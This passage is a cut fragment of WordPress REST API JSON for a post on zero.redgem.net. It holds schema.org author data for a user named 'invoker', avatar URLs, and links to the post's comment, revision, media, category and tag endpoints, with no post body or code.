redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32547","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=32547"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32547\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=32547"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=32547"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=32547"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}